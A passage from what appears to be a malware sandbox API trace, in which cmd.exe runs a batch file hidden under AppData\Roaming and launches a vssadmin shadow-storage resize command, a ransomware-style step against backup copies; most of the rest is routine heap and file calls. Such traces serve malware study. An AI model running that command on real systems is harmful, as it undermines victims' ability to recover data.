(_OSFileHandle=0x74, _Flags=8) returned 3 [0035.631] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.631] SetFilePointer (in: hFile=0x74, lDistanceToMove=324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x144 [0035.631] GetProcessHeap () returned 0x3e0000 [0035.631] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7538 | out: hHeap=0x3e0000) returned 1 [0035.631] GetProcessHeap () returned 0x3e0000 [0035.631] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7408 | out: hHeap=0x3e0000) returned 1 [0035.631] GetProcessHeap () returned 0x3e0000 [0035.631] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e0 | out: hHeap=0x3e0000) returned 1 [0035.631] GetProcessHeap () returned 0x3e0000 [0035.631] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0035.631] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8258 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0035.632] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.632] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x144 [0035.632] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x177d, lpOverlapped=0x0) returned 1 [0035.632] SetFilePointer (in: hFile=0x74, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.632] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=65, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\n") returned 65 [0035.632] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.632] GetFileType (hFile=0x74) returned 0x1 [0035.632] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.632] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.632] GetProcessHeap () returned 0x3e0000 [0035.632] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0035.633] GetProcessHeap () returned 0x3e0000 [0035.633] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0035.633] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0035.633] GetProcessHeap () returned 0x3e0000 [0035.633] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0035.633] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x78) returned 0x3f0ee0 [0035.634] _tell (_FileHandle=3) returned 389 [0035.634] _close (_FileHandle=3) returned 0 [0035.634] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0035.634] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0035.634] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0035.634] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0035.634] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0035.634] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0035.634] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0035.634] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0035.634] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0035.634] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0035.634] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0035.634] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0035.634] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0035.634] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0035.634] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0035.634] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0035.634] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0035.634] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0035.634] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0035.634] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0035.634] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0035.634] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0035.634] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0035.634] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0035.634] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0035.634] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0035.634] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0035.635] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0035.635] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0035.635] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0035.635] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0035.635] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0035.635] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0035.635] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0035.635] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0035.635] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0035.635] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0035.635] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0035.635] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0035.635] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0035.635] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0035.635] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0035.635] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0035.635] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0035.635] SetErrorMode (uMode=0x0) returned 0x1 [0035.635] GetProcessHeap () returned 0x3e0000 [0035.635] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0035.635] GetProcessHeap () returned 0x3e0000 [0035.635] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0035.635] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.635] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.635] GetProcessHeap () returned 0x3e0000 [0035.635] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0035.635] GetProcessHeap () returned 0x3e0000 [0035.635] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0035.635] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0035.636] GetProcessHeap () returned 0x3e0000 [0035.636] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0035.636] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.636] GetProcessHeap () returned 0x3e0000 [0035.636] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0035.636] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0035.636] GetProcessHeap () returned 0x3e0000 [0035.636] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0035.636] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.636] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.636] GetLastError () returned 0x2 [0035.636] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.636] GetLastError () returned 0x2 [0035.636] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.636] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0035.636] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.636] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.637] GetLastError () returned 0x2 [0035.637] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0035.637] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.637] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.637] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.637] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.637] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0035.637] GetProcessHeap () returned 0x3e0000 [0035.637] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8a) returned 0x3f7250 [0035.637] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0035.637] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0035.637] SetErrorMode (uMode=0x0) returned 0x1 [0035.637] GetProcessHeap () returned 0x3e0000 [0035.637] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0035.637] GetProcessHeap () returned 0x3e0000 [0035.637] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0035.637] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.637] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.637] GetProcessHeap () returned 0x3e0000 [0035.637] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e8 [0035.638] GetProcessHeap () returned 0x3e0000 [0035.638] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7410 [0035.638] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7410, Size=0x122) returned 0x3f7410 [0035.638] GetProcessHeap () returned 0x3e0000 [0035.638] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7410) returned 0x122 [0035.638] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.638] GetProcessHeap () returned 0x3e0000 [0035.638] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7540 [0035.638] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7540, Size=0x76) returned 0x3f7540 [0035.638] GetProcessHeap () returned 0x3e0000 [0035.638] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7540) returned 0x76 [0035.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.638] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.638] GetLastError () returned 0x2 [0035.638] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.638] GetLastError () returned 0x2 [0035.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.638] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0035.638] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.639] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.639] GetLastError () returned 0x2 [0035.639] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0035.639] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.639] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.639] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.639] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.639] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0035.639] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0035.639] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0035.639] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.639] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.640] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.640] GetProcessHeap () returned 0x3e0000 [0035.640] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0035.640] GetProcessHeap () returned 0x3e0000 [0035.641] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0035.641] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.641] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa54, dwThreadId=0xa58)) returned 1 [0035.645] CloseHandle (hObject=0x74) returned 1 [0035.645] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.645] GetProcessHeap () returned 0x3e0000 [0035.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.645] GetEnvironmentStringsW () returned 0x3f8408* [0035.645] GetProcessHeap () returned 0x3e0000 [0035.645] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.645] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.645] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0035.758] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0035.758] CloseHandle (hObject=0x78) returned 1 [0035.758] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0035.758] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0035.758] GetProcessHeap () returned 0x3e0000 [0035.758] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.758] GetEnvironmentStringsW () returned 0x3f8408* [0035.758] GetProcessHeap () returned 0x3e0000 [0035.758] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.758] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.758] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0035.758] GetProcessHeap () returned 0x3e0000 [0035.758] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.758] GetEnvironmentStringsW () returned 0x3f8408* [0035.759] GetProcessHeap () returned 0x3e0000 [0035.759] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.759] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.759] GetProcessHeap () returned 0x3e0000 [0035.759] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0035.759] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0035.759] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.759] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0035.759] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.759] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0035.759] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.759] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0035.759] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.759] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0035.760] SetConsoleInputExeNameW () returned 0x1 [0035.760] GetConsoleOutputCP () returned 0x1b5 [0035.760] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0035.760] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0035.760] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0035.760] _get_osfhandle (_FileHandle=3) returned 0x78 [0035.760] SetFilePointer (in: hFile=0x78, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7540 | out: hHeap=0x3e0000) returned 1 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7410 | out: hHeap=0x3e0000) returned 1 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e8 | out: hHeap=0x3e0000) returned 1 [0035.760] GetProcessHeap () returned 0x3e0000 [0035.760] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: 